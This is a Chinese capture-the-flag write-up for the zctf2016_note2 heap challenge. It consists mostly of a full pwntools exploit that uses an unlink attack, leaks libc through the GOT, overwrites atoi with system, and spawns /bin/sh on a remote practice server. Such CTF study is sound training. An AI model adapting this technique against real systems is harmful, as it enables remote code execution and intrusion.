zctf2016_note2

思路

利用unlink把note 0的指针改到存储chunk指针的ptr数组处，再把该指针改为atoi的got表地址即可泄露libc；然后通过edit函数将atoi_got改为system函数的地址，让程序再次调用atoi（此时实际执行的是system），并输入参数"/bin/sh\x00"，即执行system("/bin/sh")拿shell。

exp

from pwn import *

#context.log_level = 'debug'

#io = process('./note2')
# Remote BUUOJ instance of the challenge; swap in the process() line above
# to run against a local copy of the binary.
io = remote('node3.buuoj.cn',28019)
# Challenge binary and the libc the remote is assumed to run.  Every offset
# below (heap pointer table, GOT, libc symbols) is only valid for this exact
# build; a different libc needs a different file here.
elf = ELF('./note2')
libc = ELF('./libc/libc-2.23.so')
# GOT slot of atoi: first leaked to locate libc, later overwritten with
# system() so the menu's atoi(input) call becomes system(input).
atoi_got = elf.got['atoi']

def new(size, content):
    """Select menu option 1 (new note) with the given length and content.

    Each answer is sent only after the matching prompt has been read, so the
    helper stays in sync with the program's menu loop.  `content` is sent
    with a trailing newline (sendline).
    """
    io.sendlineafter('option--->>', '1')
    io.sendlineafter('Input the length of the note content:(less than 128)', str(size))
    io.sendlineafter('Input the note content:', content)

def show(num):
    """Select menu option 2 (show) for note `num` and return the raw bytes
    that follow the "Content is " banner.

    The final read is a plain `recv()`: it returns whatever has arrived so
    far, which may include trailing menu text.  The caller is expected to
    slice out the bytes it needs (the exploit takes the first 6).
    """
    io.sendlineafter('option--->>', '2')
    io.sendlineafter('Input the id of the note:', str(num))
    io.recvuntil('Content is ')
    leaked = io.recv()
    return leaked

def edit(num, content, num1):
    """Select menu option 3 (edit) for note `num`.

    `num1` picks the edit mode the program offers: 1 = overwrite,
    2 = append.  `content` is sent with a trailing newline (sendline).
    """
    io.sendlineafter('option--->>', '3')
    io.sendlineafter('Input the id of the note:', str(num))
    io.sendlineafter('do you want to overwrite or append?[1.overwrite/2.append]', str(num1))
    io.sendlineafter('TheNewContents:', content)

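def delete(num):
    """Select menu option 4 (delete) for note `num`.

    NOTE: the original body mixed 8-space and tab indentation, which only
    works on Python 2 (tab == 8 columns) and is a TabError on Python 3; the
    body is re-indented consistently.
    """
    io.sendlineafter('option--->>', '4')
    io.sendlineafter('Input the id of the note:', str(num))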


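# Address of the note-pointer table in .bss.  The script relies on this and
# on elf.got['atoi'] being fixed, i.e. the binary is non-PIE.
#
# The fake chunk is laid out so glibc's unlink() sanity check
# (FD->bk == P && BK->fd == P) passes with P == the pointer held in slot 0:
# fd = &slot0 - 0x18 and bk = &slot0 - 0x10 both "point back" at slot 0.
heap_ptr_1 = 0x602120
fake_chunk = p64(0) + p64(0x81 + 0x20)                    # prev_size, size 0xa0|PREV_INUSE
fake_chunk += p64(heap_ptr_1 - 0x18) + p64(heap_ptr_1 - 0x10)  # fd, bk
fake_chunk += 'a' * 0x10

io.recvuntil('Input your name:')
io.sendline('aaaa')
io.recvuntil('Input your address:')
io.sendline('1111')

# Heap layout: note 0 (0x90 chunk) carries the fake chunk in its data,
# note 1 (requested size 0 -> smallest chunk) is the one we overflow from,
# note 2 (0x90 chunk) is the victim that gets freed, note 3 keeps note 2
# away from the top chunk so the free does not just merge with top.
new(0x80, fake_chunk)
new(0, '')
new(0x80, 'b' * 0x20)
new(0x10, 'c' * 0x8)

# Overflow note 1 into note 2's header.  Presumably offset 0x18 of note 1's
# data is the low byte of note 2's size field: 0x91 -> 0x90 clears PREV_INUSE.
payload = 'd' * 0x10 + 'd' * 0x8 + p8(0x90)
edit(1, payload, 1)

# Rewrite with decreasing lengths so the copy's NUL terminator zeroes note 2's
# prev_size one byte at a time, high byte first.  A single write could not
# place a value containing NUL bytes.  (Inferred from the pattern — confirm
# against the binary's copy routine.)
for i in range(7, -1, -1):
    payload = 'd' * 0x10 + 'd' * i
    edit(1, payload, 1)

# prev_size = 0xa0: note 2 now claims the fake chunk as its free predecessor.
payload = 'd' * 0x10 + p64(0x20 + 0x80)
edit(1, payload, 1)

# free(note 2) -> backward consolidation -> unlink(fake chunk) writes
# &slot0 - 0x18 into slot 0 (and clobbers the 0x18 bytes before the table).
delete(2)

# Note 0 now "lives" inside the pointer table: offset 0x18 of it is slot 0,
# which becomes atoi@GOT.  The 0x18 bytes before the table are overwritten
# with filler in the process.
edit(0, 'a' * 0x18 + p64(atoi_got), 1)

# Fill byte must be NUL: the original had ljust(8, 'x00') (backslash lost in
# extraction), which raises TypeError because the fill is three characters.
atoi_addr = u64(show(0)[0:6].ljust(8, '\x00'))
print('atoi_addr: ' + hex(atoi_addr))
libc_base = atoi_addr - libc.sym['atoi']
system_addr = libc_base + libc.sym['system']
print('system: ' + hex(system_addr))

# Overwrite atoi@GOT with system.  This is done by hand instead of via edit():
# show() drained the socket with recv(), which may already have consumed the
# next 'option--->>' prompt, so a further recvuntil on it could block.
# sendlineafter skips any leftover menu text while looking for its prompt.
io.sendline('3')
io.sendlineafter('Input the id of the note:', '0')
io.sendlineafter('do you want to overwrite or append?[1.overwrite/2.append]', '1')
io.sendlineafter('TheNewContents:', p64(system_addr))

# The menu now calls system() on our input.  The original sent '/bin/shx00'
# (backslash lost), which would run a non-existent command; terminate with NUL.
io.sendlineafter('option--->>', '/bin/sh\x00')

io.interactive()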

参考

zctf2016_note2

原文地址:https://www.cnblogs.com/luoleqi/p/13431944.html